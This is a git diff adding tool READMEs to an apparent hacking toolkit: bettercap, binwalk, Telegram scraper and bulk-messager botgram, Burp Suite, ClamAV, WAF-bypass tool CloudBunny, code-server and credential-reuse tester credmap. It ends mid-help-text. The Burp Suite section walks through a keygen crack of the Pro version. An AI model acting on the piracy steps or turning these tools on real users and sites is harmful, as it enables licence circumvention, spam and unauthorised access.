+ +Once bettercap is installed, you can download/update system caplet with the command: + + sudo bettercap -eval "caplets.update; q" + +## Update + +In order to update to an unstable but bleeding edge release from this repository, run the commands below: + + $ go get -u github.com/bettercap/bettercap + $ cd $GOPATH/src/github.com/bettercap/bettercap + $ make build && sudo make install + +## Documentation and Examples + +The project is documented [in this wiki](https://github.com/bettercap/bettercap/wiki). + +## License + +`bettercap` is made with ♥ by [the dev team](https://github.com/orgs/bettercap/people) and it's released under the GPL 3 license. diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/binwalk.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/binwalk.md new file mode 100755 index 00000000..147ee9e0 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/binwalk.md @@ -0,0 +1,54 @@ +# Binwalk + +[![Build Status](https://travis-ci.org/ReFirmLabs/binwalk.svg?branch=master)](https://travis-ci.org/ReFirmLabs/binwalk) +[![Maintenance](https://img.shields.io/badge/Maintained%3F-yes-green.svg)](https://GitHub.com/ReFirmLabs/binwalk/graphs/commit-activity) +[![GitHub license](https://img.shields.io/github/license/ReFirmLabs/binwalk.svg)](https://github.com/ReFirmLabs/binwalk/blob/master/LICENSE) +[![GitHub stars](https://img.shields.io/github/stars/badges/shields.svg?style=social&label=Stars)](https://github.com/ReFirmLabs/binwalk/stargazers) + +Binwalk is a fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images. 
+ + +### Installation and Usage + +* [Installation](./INSTALL.md) +* [API](./API.md) +* [Supported Platforms](https://github.com/ReFirmLabs/binwalk/wiki/Supported-Platforms) +* [Getting Started](https://github.com/ReFirmLabs/binwalk/wiki/Quick-Start-Guide) +* [Binwalk Command Line Usage](https://github.com/ReFirmLabs/binwalk/wiki/Usage) +* [Binwalk IDA Plugin Usage](https://github.com/ReFirmLabs/binwalk/wiki/Creating-Custom-Plugins) + +More information on [Wiki](https://github.com/ReFirmLabs/binwalk/wiki) + +## Quick start + +### Installation +Binwalk follows the standard Python installation procedure: + +```bash +$ sudo python setup.py install +``` + +If you're running Python 2.x, installing the optional Python lzma module is strongly recommended (but not required): + +```bash +$ sudo apt-get install python-lzma +``` + +For instructions on installing other optional dependencies, see [installation guide](https://github.com/ReFirmLabs/binwalk/blob/master/INSTALL.md). + + +### Usage + +Basic usage is simple: + +```bash +$ binwalk firmware.bin + +DECIMAL HEXADECIMAL DESCRIPTION +-------------------------------------------------------------------------------- +0 0x0 TRX firmware header, little endian, header size: 28 bytes, image size: 14766080 bytes, CRC32: 0x6980E553 flags: 0x0, version: 1 +28 0x1C LZMA compressed data, properties: 0x5D, dictionary size: 65536 bytes, uncompressed size: 5494368 bytes +2319004 0x23629C Squashfs filesystem, little endian, version 4.0, compression: xz, size: 12442471 bytes, 3158 inodes, blocksize: 131072 bytes, blocksize: 131072 bytes, created: 2014-05-21 22:38:47 +``` + +For additional examples and descriptions of advanced options, see the [wiki](https://github.com/ReFirmLabs/binwalk/wiki). 
diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/blackbox.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/blackbox.md new file mode 100755 index 00000000..267d982a --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/blackbox.md @@ -0,0 +1,3 @@ +#It need modules requests pexpect passlib +# +#You can add those execute pip2 install diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/botgram.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/botgram.md new file mode 100755 index 00000000..c000d7e4 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/botgram.md @@ -0,0 +1,51 @@ +# BOTGRAM v.1 2021 by @Ivam3 + +- Botgram help you to fetch all information about Telegram group members that you manage. It automates the mass sending of messages and the addition of members to other groups from the command line (CLI). + +# Setting + +- In order for botgram manage your account, it needs the identifier number (ID) and the hash of the Telegram API to be able to connect remotely to your account. In turn, the second authentication factor must be deactivated from Telegram settings. And for this you must go to the section "API development tools" of the official Telegram site at : + +• https://my.telegram.org/ + +## • How To Install and Use + +`$ pkg install -y git python` + +`$ git clone https://github.com/ivam3/botgram.git` + +`$ cd botgram` + +* Install requierments + +`$ python setup.py --install` + +* setup configration file ( apiID, apiHASH ) + +`$ python setup.py --config` + +* To merge 2 .csv files in one + +`$ python setup.py --merge file1.csv file2.csv` + +* To Genrate User Data + +`$ python getdata.py` + +* ( members.csv is default if you changed name use it ) +* Send bulk message to collected data + +`$ python sendmsg.py members.csv` + +* Add members to your group + +`$ python add2group.py members.csv` + +# DISCLAIMER +If the law is violated with it's use, this would be the responsibility of the user who handled it.. 
Ivam3 is not responsible for the misuse that can be given to everything that this tool entails + +To get help about how to use it and/or to report some issues join to : + + • https://t.me/Ivam3_Bot + + diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/burpsuite.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/burpsuite.md new file mode 100755 index 00000000..7a6b9f3c --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/B/burpsuite.md @@ -0,0 +1,1505 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + burpsuite/README.md at master · thehackingsage/burpsuite · GitHub + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ Skip to content + + + + + + + + + + +
+ +
+ + + + + + + +
+ + + +
+ + + + + + + + + + +
+
+
+ + + + + + + + + + + + + + +
+
+ + + + + + + + +
+ + + + + Permalink + + +
+ +
+
+ + + master + + + + +
+
+
+ Switch branches/tags + +
+ + + +
+ +
+ +
+ + +
+ +
+ + + + + + + + + + + + + + + + +
+ + +
+
+
+
+ +
+ +
+ + + + Go to file + + +
+ + + + +
+
+
+ + + + +
+ +
+
+
 
+
+ +
+
 
+ Cannot retrieve contributors at this time +
+
+ + + + + + + + +
+ +
+ + + + +
+ + 72 lines (38 sloc) + + 2.74 KB +
+ + + +
+ +
+
+ + +
+

+

BurpSuite Pro, Plugins and Payloads

+

Article : https://thehacktronian.blogspot.com/2018/09/burpsuitepro.html

+

Download BurpSuite Pro, Plugins and Payloads : http://bit.ly/burpsuitepro

+

Payloads : https://github.com/1N3/IntruderPayloads

+

More Payloads : https://github.com/swisskyrepo/PayloadsAllTheThings

+

Requirements :

+

Burp requires a computer with the official Java Runtime Environment (64-bit edition, version 1.6 or later) installed.

+

Download the latest Java Runtime Environment (JRE) : Click Here

+

How To Use Burp Suite Pro ? :

+
    +
  • +

    Download BurpSuitePro as ZIP : http://bit.ly/burpsuitepro

    +
  • +
  • +

    extract > BurpSuite Folder > core Folder

    +
  • +
  • +

    open BurpSuite-Keygen.jar with java

    +
  • +
  • +

    open BurpSuite-Pro-v1.7.37.jar with java

    +
  • +
  • +

    copy-paste License from Keygen to BurpSuite and click on Next

    +
  • +
  • +

    choose Manual Installation and copy-paste Activation Request from BurpSuite to Keygen

    +
  • +
  • +

    now copy-paste Activation Response from Keygen to BurpSuite

    +
  • +
  • +

    click next and your pro version will activate

    +
  • +
+

that's it !!! start using BurpSuite Pro v1.7.37.exe

+

you don't have to repeat this process again and again. After doing it once, Windows users run the .exe file & Linux users run the .sh file to use BurpSuite Pro.

+

If you face any problem, feel free to ask.

+

How To Use Burp Suite Plugins ? :

+
    +
  • +

    open BurpSuite

    +
  • +
  • +

    go to Extender > Extensions

    +
  • +
  • +

    click on Add and Select .jar file & then click on Next

    +
  • +
+

+

That's It !!!

+

One more thing you need to know: now that you are using BurpSuite Pro, you can also use all Pro extensions from the BApp Store.

+

Some Useful Extensions in BApp Store :

+

Backslash Powered Scanner, Reflected Parameters, SAML Encoder/Decoder, Bypass WAF, CVSS Calculator, Java deserialization Scanner, Autorize, BurpSmartBuster, Content Type Converter, JSON Beautifier, PsychoPATH, Retire-js, J2EEScan, SAML Raider, Active Scan ++, UUID Detector, Wsdler, Additional Scanner Checks, CO2 Flow, Hackvertor, Meth0dMan & Paramalyzer.

+

+

Video Tutorial :

+

YouTube : Soon

+

That's It !!!

+

& Don't Forget To Follow Me At Twitter, Instagram, Github & SUBSCRIBE My YouTube Channel..!!!

+

Thank you. +Keep visiting.. +Enjoy.!!! :)

+
+
+ +
+ +
+ + + +
+ + +
+ + +
+
+ + +
+ + + +
+
+ +
+
+ +
+ + + + + + + + + + + + + + + + + + + + + diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/chatgpt.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/chatgpt.md new file mode 100755 index 00000000..a857c5b5 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/chatgpt.md @@ -0,0 +1,49 @@ +# Quick guide for option chatGPT from command i-Haklab. + +A simple, lightweight shell script to use OpenAI's chatGPT and DALL-E from the terminal. +The script uses the `completions` endpoint and the `text-davinci-003` model for chatGPT and the `images/generations` endpoint for generating images. +/ +## Features + +- Chat with GPT from the terminal +- Generate images from a text prompt +- View your chat history +- Chat context, GPT remembers previous chat questions and answers +- List all available OpenAI models +- Set OpenAI request parameters + +## Getting Started + +## Usage + +### Start + + - Run the script by using the `chatGPT` option from the command i-Haklab anywhere + ```bash + i-Haklab chatGPT + ``` + +### Commands + + - `image:` To generate images, start a prompt with `image:` + If you are using iTerm, you can view the image directly in the terminal. Otherwise the script will ask to open the image in your browser. + - `history` To view your chat history, type `history` + - `models` To get a list of the models available at OpenAI API, type `models` + - `model:` To view all the information on a specific model, start a prompt with `model:` and the model `id` as it appears in the list of models. For example: `model:text-babbage:001` will get you all the fields for `text-babbage:001` model + +### Chat context + + - You can enable chat context mode for the model to remember your previous chat questions and answers. This way you can ask follow-up questions. To enable this mode start the script with `-c` or `--chat-context`. i.e. `i-Haklab chatGPT --chat-context` and start to chat normally. 
+ +### Set request parameters + + - To set request parameters you can start the script like this: `i-Haklab chatGPT --temperature 0.9 --model text-babbage:001 --max-tokens 100 --size 1024x1024` + + The available parameters are: + - temperature, `-t` or `--temperature` + - model, `-m` or `--model` + - max number of tokens, `--max-tokens` + - image size, `-s` or `--size` (The sizes that are accepted by the OpenAI API are 256x256, 512x512, 1024x1024) + + To learn more about these parameters you can view the [API documentation](https://platform.openai.com/docs/api-reference/completions/create) + diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/clamav.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/clamav.md new file mode 100755 index 00000000..eb308e83 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/clamav.md @@ -0,0 +1,354 @@ +ClamAV +Maeve, the ClamAV mascot + +ClamAV is an open source (GPLv2) anti-virus toolkit, designed especially for e-mail scanning on mail gateways. It provides a number of utilities including a flexible and scalable multi-threaded daemon, a command line scanner and advanced tool for automatic database updates. The core of the package is an anti-virus engine available in a form of shared library. + +Tip: ClamAV is not a traditional anti-virus or endpoint security suite. For a fully featured modern endpoint security suite, check out Cisco Secure Endpoint. See "related products", below, for more details. + +ClamAV is brought to you by Cisco Systems, Inc. + +Community Projects +ClamAV has a diverse ecosystem of community projects, products, and other tools that either depend on ClamAV to provide malware detection capabilities or supplement ClamAV with new features such as improved support for 3rd party signature databases, graphical user interfaces (GUI), and more. + +Features: + +ClamAV is designed to scan files quickly. + +Real time protection (Linux only). 
The ClamOnAcc client for the ClamD scanning daemon provides on-access scanning on modern versions of Linux. This includes an optional capability to block file access until a file has been scanned (on-access prevention). + +ClamAV detects millions of viruses, worms, trojans, and other malware, including Microsoft Office macro viruses, mobile malware, and other threats. + +ClamAV's bytecode signature runtime, powered by either LLVM or our custom bytecode interpreter, allows the ClamAV signature writers to create and distribute very complex detection routines and remotely enhance the scanner’s functionality. + +Signed signature databases ensure that ClamAV will only execute trusted signature definitions. + +ClamAV scans within archives and compressed files but also protects against archive bombs. Built-in archive extraction capabilities include: + +Zip (including SFX, excluding some newer or more complex extensions) +RAR (including SFX, most versions) +7Zip +ARJ (including SFX) +Tar +CPIO +Gzip +Bzip2 +DMG +IMG +ISO 9660 +PKG +HFS+ partition +HFSX partition +APM disk image +GPT disk image +MBR disk image +XAR +XZ +Microsoft OLE2 (Office documments) +Microsoft OOXML (Office documments) +Microsoft Cabinet Files (including SFX) +Microsoft CHM (Compiled HTML) +Microsoft SZDD compression format +HWP (Hangul Word Processor documents) +BinHex +SIS (SymbianOS packages) +AutoIt +InstallShield +ESTsoft EGG +Supports Windows executable file parsing, also known as Portable Executables (PE) both 32/64-bit, including PE files that are compressed or obfuscated with: +AsPack +UPX +FSG +Petite +PeSpin +NsPack +wwpack32 +MEW +Upack +Y0da Cryptor +Supports ELF and Mach-O files (both 32 and 64-bit) +Supports almost all mail file formats +Support for other special files/formats includes: +HTML +RTF +PDF +Files encrypted with CryptFF and ScrEnc +uuencode +TNEF (winmail.dat) +Advanced database updater with support for scripted updates, digital signatures and DNS based database version 
queries + +Disclaimer: Many of the above file formats continue to evolve. Executable packing and obfuscation tools in particular are constantly changing. We cannot guarantee that we can unpack or extract every version or variant of the listed formats. + +License +ClamAV is licensed under the GNU General Public License, Version 2. + +Supported platforms +Clam AntiVirus is highly cross-platform. The development team cannot test every OS, so we have chosen to test ClamAV using the two most recent Long Term Support (LTS) versions of each of the most popular desktop operating systems. Our regularly tested operating systems include: + +GNU/Linux +Alpine +3.11 (64bit) +Ubuntu +18.04 (64bit, 32bit) +20.04 (64bit) +Debian +9 (64bit, 32bit) +10 (64bit, 32bit) +CentOS +7 (64bit, 32bit) +8 (64bit) +Fedora +30 (64bit) +31 (64bit) +openSUSE +Leap (64bit) +UNIX +FreeBSD +11 (64bit) +12 (64bit) +macOS +10.13 High Sierra (x86_64) +10.15 Catalina (x86_64) +11.5 Big Sur (x86_64, arm64) +Windows +7 (64bit, 32bit) +10 (64bit, 32bit) +Recommended System Requirements +The following minimum recommended system requirements are for using ClamScan or ClamD applications with the standard ClamAV signature database provided by Cisco. + +Minimum recommended RAM for ClamAV: + +FreeBSD and Linux server edition: 2 GiB+ +Linux non-server edition: 2 GiB+ +Windows 7 & 10 32-bit: 2 GiB+ +Windows 7 & 10 64-bit: 3 GiB+ +macOS: 3 GiB+ +Minimum recommended CPU for ClamAV: + +1 CPU at 2.0 Ghz+ +Minimum available hard disk space required: + +For the ClamAV application we recommend having 5 GB of free space available. This recommendation is in addition to the recommended disk space for each OS. + +Note: The tests to determine these minimum requirements were performed on systems that were not running other applications. If other applications are being run on the system, additional resources will be required in addition to our recommended minimums. 
+ +Mailing Lists and Chat +If you have a trouble installing or using ClamAV try asking on our mailing lists. There are four lists available: + +clamav-announce (at) lists.clamav.net +info about new versions, moderated. +Subscribers are not allowed to post to this mailing list. +clamav-users (at) lists.clamav.net +user questions +clamav-devel (at) lists.clamav.net +technical discussions +clamav-virusdb (at) lists.clamav.net +database update announcements, moderated +clamav-binary (at) lists.clamav.net +discussion and announcements for package maintainers +You can subscribe and search the mailing list archives here. + +You can also join the community on our ClamAV Discord chat server. + +Submitting New or Otherwise Undetected Malware +If you've got a virus which is not detected by the current version of ClamAV using the latest signature databases, please submit the sample for review at our website: + +https://www.clamav.net/reports/malware + +Likewise, if you have a benign file that is flagging as a virus and you wish to report a False Positive, please submit the sample for review at our website: + +https://www.clamav.net/reports/fp + +## DAEMON + +ClamD +clamd is a multi-threaded daemon that uses libclamav to scan files for viruses. Scanning behavior can be fully configured to fit most needs by modifying clamd.conf. + +As clamd requires a virus signature database to run, we recommend setting up ClamAV's official signatures before running clamd using freshclam. + +The daemon works by listening for commands on the sockets specified in clamd.conf. Listening is supported over both unix local sockets and TCP sockets. + +IMPORTANT: clamd does not currently protect or authenticate traffic coming over the TCP socket, meaning it will accept any and all of the following commands listed from any source. Thus, we strongly recommend following best networking practices when setting up your clamd instance. I.e. don't expose your TCP socket to the Internet. 
+ +Here is a quick list of the commands accepted by clamd over the socket. + +PING +VERSION +RELOAD +SHUTDOWN +SCAN file/directory +RAWSCAN file/directory +CONTSCAN file/directory +MULTISCAN file/directory +ALLMATCHSCAN file/directory +INSTREAM +FILDES +STATS +IDSESSION, END +As with most ClamAV tools, you can find out more about these by invoking the command: + + +man clamd +The daemon also handles the following signals as so: + +SIGTERM - perform a clean exit +SIGHUP - reopen the log file +SIGUSR2 - reload the database +It should be noted that clamd should not be started using the shell operator & or other external tools which would start it as a background process. Instead, you should run clamd which will load the database and then daemonize itself (unless you have specified otherwise in clamd.conf). After that, clamd is ready to accept connections and perform file scanning. + +Once you have set up your configuration to your liking, and understand how you will be sending commands to the daemon, running clamd itself is simple. Simply execute the command: + + +clamd +ClamDScan +clamdscan is a clamd client, which greatly simplifies the task of scanning files with clamd. It sends commands to the clamd daemon across the socket specified in clamd.conf and generates a scan report after all requested scanning has been completed by the daemon. + +Thus, to run clamdscan, you must have an instance of clamd already running as well. + +Please keep in mind, that as a simple scanning client, clamdscan cannot change scanning and engine configurations. These are tied to the clamd instance and the configuration you set up in clamd.conf. Therefore, while clamdscan will accept many of the same commands as its sister tool clamscan, it will simply ignore most of them as (by design) no mechanism exists to make ClamAV engine configuration changes over the clamd socket. 
+ +Again, running clamdscan, once you have a working clamd instance, is simple: + + +clamdscan [*options*] [*file/directory/-*] +ClamDTop +clamdtop is a tool to monitor one or multiple instances of clamd. It has a colorized ncurses interface, which shows each job queued, memory usage, and information about the loaded signature database for the connected clamd instance(s). By default it will attempt to connect to the local clamd as defined in clamd.conf. However, you can specify other clamd instances at the command line. + +To learn more, use the commands + + +man clamdtop +or + + +clamdtop --help +On-Access Scanning +The ClamOnAcc application provides On-Access Scanning for Linux systems. On-Access Scanning is a form of real-time protection that uses ClamD to scan files when they're accessed. + +ClamOnAcc (v0.102+) +ClamAV's On-Access Scanning (clamonacc) is a client that runs in its own application alongside, but separately from the clamd instance. The On-Access Scanner is capable of preventing access to/from any malicious files it discovers--based on the verdict it receives from clamd--but by default it is configured to run in notify-only mode, which means it will simply alert the user if a malicious file is detected, then take any additional actions that the user may have specified at the command line, but it will not actively prevent processes from reading or writing to that file. + +Disclaimer: Enabling Prevention mode will seriously impact performance if used on commonly accessed directories. + +Tip: You can run ClamOnAcc multiple times simultaneously, each with a different config. If you want to enable Prevention-mode for one directory, while sticking to notify-only mode for any other monitored directories, that's an option! + +On-Access Scanning is primarily set up through clamd.conf. However, you can learn more about all the configuration and command line options available to you by reading the On-Access Scanning User Guide. 
+ +Once you have set up the On-Access Scanner (and clamd) to your liking, you will first need to run clamd before you can start it. If your clamd instance is local, it is required you run clamd as a user that is excluded (via OnAccessExcludeUname or OnAccessExcludeUID) from On-Access scanning events (e.g.) to prevent clamonacc from triggering events endlessly as it sends scan requests to clamd: + + +su - clamav -c "/usr/local/bin/clamd +After the daemon is running, you can start the On-Access Scanner. clamonacc must be run as root in order to utilize its kernel event detection and intervention features: + + +sudo clamonacc +It will run a number of startup checks to test for a sane configuration, and ensure it can connect to clamd, and if everything checks out clamonacc will automatically fork to the background and begin monitoring your system for events. + +ClamD (v0.101) +In older versions, ClamAV's On-Access Scanner is a thread that runs within a clamd instance. The On-Access Scanner is capable of blocking access to/from any malicious files it discovers--based on the verdict it finds using the engine it shares with clamd--but by default it is configured to run in notify-only mode, which means it will simply alert the user if a malicious file is detected, but it will not actively prevent processes from reading or writing to that file. + +On-Access Scanning is primarily set up through clamd.conf. However, you can learn more about all the configuration and command line options available to you by reading the On-Access Scanning User Guide. + +Once you have set up the On-Access Scanner to your liking, you will need to run clamd with elevated permissions to start it. + + +sudo clamd +One-Time Scanning +ClamScan +clamscan is a command line tool which uses libclamav to scan files and/or directories for viruses. Unlike clamdscan, clamscan does not require a running clamd instance to function. 
Instead, clamscan will create a new engine and load in the virus database each time it is run. It will then scan the files and/or directories specified at the command line, create a scan report, and exit. + +By default, when loading databases, clamscan will check the location to which freshclam installed the virus database signatures. This behavior, along with a myriad of other scanning and engine controls, can be modified by providing flags and other options at the command line. + +There are too many options to list all of them here. So we'll only cover a few common and more interesting ones: + +--log=FILE - save scan report to FILE +--database=FILE/DIR - load virus database from FILE or load all supported db files from DIR +--official-db-only[=yes/no(*)] - only load official signatures +--max-filesize=#n - files larger than this will be skipped and assumed clean +--max-scansize=#n - the maximum amount of data to scan for each container file +--leave-temps[=yes/no(*)]- do not remove temporary files +--file-list=FILE - scan files from FILE +--quiet - only output error messages +--bell - sound bell on virus detection +--cross-fs[=yes(*)/no] - scan files and directories on other filesystems +--move=DIRECTORY - move infected files into DIRECTORY +--copy=DIRECTORY - copy infected files into DIRECTORY +--bytecode-timeout=N - set bytecode timeout (in milliseconds) +--heuristic-alerts[=yes(*)/no] - toggles heuristic alerts +--alert-encrypted[=yes/no(*)] - alert on encrypted archives and documents +--nocerts - disable authenticode certificate chain verification in PE files +--disable-cache - disable caching and cache checks for hash sums of scanned files +To learn more about the options available when using clamscan please reference: + + +man clamscan +and + + +clamscan --help +Otherwise, the general usage of clamscan is: + + +clamscan [options] [file/directory/-] +Some basic scans +Run this to scan the files in the current directory: + + +clamscan . 
+This will scan the current directory. At the end of the scan, it will display a summary. If you notice in the clamscan output, it only scanned something like 60 files, even though there are more files in subdirectories. By default, clamscan will only scan files in the current directory. + +Run this to scan all the files in the current directory: + + +clamscan --recursive . +Run this to scan ALL the files on your system, it will take quite a while. Keep in mind that you can cancel it at any time by pressing Ctrl-C: + +Linux/Unix: + + +clamscan --recursive / +Windows: + + +clamscan.exe --recursive C:\ +Process Memory Scanning +Note: This feature requires Windows and ClamAV version 0.105 or newer. You must also be running ClamAV as Administrator. + +clamscan and clamdscan are able to scan the virtual memory of currently executing processes. To do so, use the --memory option: + + +clamscan --memory +The --kill and --unload options allow for killing/unloading infected loaded modules. + +Disclaimers +Disclaimer: ClamAV doesn't have a "quick scan" mode. ClamAV is malware detection toolkit, not an endpoint security suite. It's up to you to decide what to scan. A full system scan is going to take a long time with ClamAV or with any anti-virus software. + +Disclaimer 2: ClamScan, ClamOnAcc, and ClamDScan each include --remove options for deleting any file which alerts during a scan. This is generally a terrible idea, unless you're monitoring an upload/downloads directory. False positives happen! You do not want to have the wrong file accidentally deleted. Instead, consider using --move or perhaps just --copy and set up script with the ClamD VirusEvent feature to notify you when something has been detected. + +Windows-specific Issues +Globbing +Since the Windows command prompt doesn't take care of wildcard expansion, minimal emulation of unix glob() is performed internally. It supports * and ? only. + +File paths +Please always use the backslash as the path separator. 
SMB Network shares and UNC paths are supported. + +Socket and libclamav API Input +The Windows version of ClamAV requires all the input to be UTF-8 encoded. + +This affects: + +The API, notably the cl_scanfile() function +ClamD socket input, e.g. the commands SCAN, CONTSCAN, MUTLISCAN, etc. +ClamD socket output, i.e replies to the above queries +For legacy reasons ANSI (i.e. CP_ACP) input will still be accepted and processed as before, but with two important remarks: + +Socket replies to ANSI queries will still be UTF-8 encoded. +ANSI sequences which are also valid UTF-8 sequences will be handled as UTF-8. +As a side note, console output (stdin and stderr) will always be OEM encoded, even when redirected to a file. + + +Related Products +Cisco Secure Endpoint (formerly AMP for Endpoints) is Cisco's cloud-based security suite for commercial and enterprise customers. Secure Endpoint is available for Windows, Linux, and macOS and provides superior malware detection capabilities, behavioral monitoring, dynamic file analysis, endpoint isolation, analytics, and threat hunting. Secure Endpoint sports a modern administrative web interface (dashboard). + +Immunet is a cloud-based antivirus application for Windows that is free for non-commercial use. Immunet offers great malware detection efficacy but, as a completely free product, Immunet's does not have same features or the quality user experience that Secure Endpoint offers. There is an Immunet user forum but Cisco offers no official user support. + +Cisco Systems, Inc diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/cloudbunny.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/cloudbunny.md new file mode 100755 index 00000000..4677627f --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/cloudbunny.md @@ -0,0 +1,93 @@ +# CloudBunny + +CloudBunny is a tool to capture the origin server that uses a WAF as a proxy or protection. + +You can read more about the tool here: https://tinyurl.com/y8p48wb3 + +

+ +

+ +# How works + +In this tool we used three search engines to search domain information: Shodan, Censys and Zoomeye. To use the tools you need the API Keys, you can pick up the following links: + +
+Shodan - https://account.shodan.io/
+Censys - https://censys.io/account/api
+ZoomEye - https://www.zoomeye.org/profile
+
+ +NOTE: In Zoomeye you need to enter the login and password, it generates a dynamic api key and I already do this work for you. Just enter your login and password. + +After that you need to put the credentials in the api.conf file. + +Install the requirements: + +
+$ sudo pip install -r requirements.txt
+
+ +# Usage + +By default the tool searches on all search engines (you can set this up by arguments), but you need to put the credentials as stated above. After you have loaded the credentials and installed the requirements, execute: + +
+$ python cloudbunny.py -u securityattack.com.br
+
+ +Check our help area: + +
+$ python cloudbunny.py -h
+
+ +Change securityattack.com.br for the domain of your choice. + +# Example + +
+
+$ python cloudbunny.py -u site_example.com.br
+
+	            /|      __  
+	           / |   ,-~ /  
+	          Y :|  //  /    
+	          | jj /( .^  
+	          >-"~"-v"  
+	         /       Y    
+	        jo  o    |  
+	       ( ~T~     j   
+	        >._-' _./   
+	       /   "~"  |    
+	      Y     _,  |      
+	     /| ;-"~ _  l    
+	    / l/ ,-"~    \  
+	    \//\/      .- \  
+	     Y        /    Y*  
+	     l       I     ! 
+	     ]\      _\    /"\ 
+	    (" ~----( ~   Y.  )   
+	~~~~~~~~~~~~~~~~~~~~~~~~~~    
+CloudBunny - Bypass WAF with Search Engines 
+Author: Eddy Oliveira (@Warflop)
+https://github.com/Warflop 
+    
+[+] Looking for target on Shodan...
+[+] Looking for target on Censys...
+[+] Looking for certificates on Censys...
+[+] Looking for target on ZoomEye...
+[-] Just more some seconds...
+
+
++---------------+------------+-----------+----------------------------+
+|   IP Address  |    ISP     |   Ports   |        Last Update         |
++---------------+------------+-----------+----------------------------+
+|  55.14.232.4  | Amazon.com | [80, 443] | 2018-11-02T16:02:51.074543 |
+| 54.222.146.40 | Amazon.com |    [80]   | 2018-11-02T10:16:38.166829 |
+| 18.235.52.237 | Amazon.com | [443, 80] | 2018-11-08T01:22:11.323980 |
+| 54.237.93.127 | Amazon.com | [443, 80] | 2018-11-05T15:54:40.248599 |
+| 53.222.94.157 | Amazon.com | [443, 80] | 2018-11-06T08:46:03.377082 |
++---------------+------------+-----------+----------------------------+
+    We may have some false positives :)
+
diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/code-server.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/code-server.md new file mode 100755 index 00000000..db350cd9 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/code-server.md @@ -0,0 +1,71 @@ + + +# Termux + +- [Install](#install) +- [Upgrade](#upgrade) +- [Known Issues](#known-issues) + - [Search doesn't work](#search-doesnt-work) + - [Backspace doesn't work](#backspace-doesnt-work) + + + +Termux is a terminal application and Linux environment that you can also use to +run code-server from your Android phone. + +## Install + +1. Install Termux from [F-Droid](https://f-droid.org/en/packages/com.termux/). +1. Make sure it's up-to-date: `apt update && apt upgrade` +1. Install required packages: `apt install build-essential python git nodejs yarn` +1. Install code-server: `yarn global add code-server` +1. Run code-server: `code-server` and navigate to localhost:8080 in your browser + +## Upgrade + +To upgrade run: `yarn global upgrade code-server --latest` + +## Known Issues + +The following details known issues and suggested workarounds for using +code-server with Termux. + +### Search doesn't work + +There is a known issue with search not working on Android because it's missing +`bin/rg` ([context](https://github.com/cdr/code-server/issues/1730#issuecomment-721515979)). To fix this: + +1. Install `ripgrep` with `pkg` + + ```sh + pkg install ripgrep + ``` + +1. Make a soft link using `ln -s` + + ```sh + # run this command inside the code-server directory + ln -s $PREFIX/bin/rg ./lib/vscode/node_modules/vscode-ripgrep/bin/rg + ``` + +### Backspace doesn't work + +When using Android's on-screen keyboard, the backspace key doesn't work +properly. 
This is a known upstream issue: + +- [Issues with backspace in Codespaces on Android (Surface Duo)](https://github.com/microsoft/vscode/issues/107602) +- [Support mobile platforms](https://github.com/xtermjs/xterm.js/issues/1101) + +There are two workarounds. + +**Option 1:** Modify keyboard dispatch settings + +1. Open the Command Palette +2. Search for **Preferences: Open Settings (JSON)** +3. Add `"keyboard.dispatch": "keyCode"` + +The backspace button should work at this point. + +_Thanks to @Nefomemes for the [suggestion](https://github.com/cdr/code-server/issues/1141#issuecomment-789463707)!_ + +**Option 2:** Use a Bluetooth keyboard. diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/credmap.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/credmap.md new file mode 100755 index 00000000..da9827ad --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/credmap.md @@ -0,0 +1,45 @@ +credmap: The Credential Mapper +=== + +Credmap is an open source tool that was created to bring awareness to the dangers of credential reuse. It is capable of testing supplied user credentials on several known websites to test if the password has been reused on any of these. An official introductionary post can be found [here](http://websec.ca/blog/view/credmap). + +### Help Menu + Usage: credmap.py --email EMAIL | --user USER | --load LIST [options] + + Options: + -h/--help show this help message and exit + -v/--verbose display extra output information + -u/--username=USER.. set the username to test with + -p/--password=PASS.. set the password to test with + -e/--email=EMAIL set an email to test with + -l/--load=LOAD_FILE load list of credentials in format USER:PASSWORD + -f/--format=CRED_F.. format to use when reading from file (e.g. u|e:p) + -x/--exclude=EXCLUDE exclude sites from testing + -o/--only=ONLY test only listed sites + -s/--safe-urls only test sites that use HTTPS. + -i/--ignore-proxy ignore system default HTTP proxy + --proxy=PROXY set proxy (e.g. 
